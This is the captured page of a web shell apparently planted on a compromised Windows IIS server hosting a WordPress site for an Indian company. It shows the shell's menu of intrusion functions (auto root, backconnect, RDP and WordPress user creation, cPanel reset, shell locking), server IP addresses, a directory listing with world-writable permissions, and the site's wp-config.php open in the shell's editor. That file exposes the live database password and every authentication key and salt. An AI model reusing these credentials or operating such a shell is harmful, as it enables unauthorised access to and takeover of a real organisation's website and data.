Windows NT WIN-K3URTCG1QHU 10.0 build 20348 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
: 185.131.54.15 | : 216.73.217.63
Cant Read [ /etc/named.conf ]
7.4.33
IWPD_188(magnatech)
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
C: /
Inetpub /
vhosts /
magnatechindia.com /
httpdocs /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxrwxrwx
App_Data
[ DIR ]
drwxrwxrwx
aspnet_client
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxrwxrwx
img
[ DIR ]
drwxrwxrwx
test
[ DIR ]
drwxrwxrwx
wp-admin
[ DIR ]
drwxrwxrwx
wp-content
[ DIR ]
drwxrwxrwx
wp-includes
[ DIR ]
drwxrwxrwx
.htaccess
616
B
-rw-rw-rw-
.user.ini
287
B
-rw-rw-rw-
favicon.ico
110.8
KB
-rw-rw-rw-
index.php
405
B
-rw-rw-rw-
license.txt
19.44
KB
-rw-rw-rw-
magnatech.zip
475.23
MB
-rw-rw-rw-
readme.html
7.23
KB
-rw-rw-rw-
web.config
2.74
KB
-rw-rw-rw-
wp-activate.php
7.54
KB
-rw-rw-rw-
wp-blog-header.php
351
B
-rw-rw-rw-
wp-comments-post.php
2.27
KB
-rw-rw-rw-
wp-config-sample.php
3.26
KB
-rw-rw-rw-
wp-config.php
2.66
KB
-rw-rw-rw-
wp-cron.php
5.49
KB
-rw-rw-rw-
wp-links-opml.php
2.43
KB
-rw-rw-rw-
wp-load.php
3.84
KB
-rw-rw-rw-
wp-login.php
51.3
KB
-rw-rw-rw-
wp-mail.php
8.52
KB
-rw-rw-rw-
wp-settings.php
61.12
KB
-rw-rw-rw-
wp-signup.php
34.26
KB
-rw-rw-rw-
wp-trackback.php
5.27
KB
-rw-rw-rw-
xmlrpc.php
3.13
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-config.php
<?php // Added by AirLift /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'wp_d96kw' ); /** MySQL database username */ define( 'DB_USER', 'wp_8qrxr' ); /** MySQL database password */ define( 'DB_PASSWORD', '$G*~Or*tS8tr6IL1' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost:3306' ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /** * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', 'tF/yu%th+po0%7jT5Vtbb-G3i]tAd(jk6cK%59ZC~SL!Rb1@J8KiFP6d|5T![|o1'); define('SECURE_AUTH_KEY', 'oXD0FHOR05T8~NNh5y%GF6C;p/3%9(h4a&;]3Tjw#dH8)9F14jU8b|j~WmS3m-_6'); define('LOGGED_IN_KEY', 's9b]N!y[055W6vF5_r:VPW5uBAGSh%~%Qk7nFqqIz#9~4lzT86K;J6c+:cD9bdx]'); define('NONCE_KEY', 'C8f%91gsN+P#i8%@2Wy6nk*+3h3TJK7yHr7d*Nr26]Pem0T6nEyC;5S/rb8Ml65B'); define('AUTH_SALT', ')AIL4(w&aQhq~Ue0:3%g)UX-*7Xl7p6]8-e3p9|9_w*j*0x7S13b5K9r4b8g7tR0'); define('SECURE_AUTH_SALT', 'mN6c0brAa-3LS|fUz])z1fdp7Rkr]2919Qz[G5h0;Ru5h%|jI2VI78/F;)Fbr87d'); define('LOGGED_IN_SALT', 'Hno3&AY4wt:|1:#d6yH[43K_6JQZ5XR(mf/6jf*9@#7NA1mZ*9~1k*sz|3d230y['); define('NONCE_SALT', '5pTy*:S&g)MuZ5-wC!Pu5_*!#Ku5OnxRkQT2CJ!LcnyEaltb(+bEDp]]|zLba9:0'); /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'g6ee6_'; define('WP_ALLOW_MULTISITE', true); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', dirname( __FILE__ ) . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Close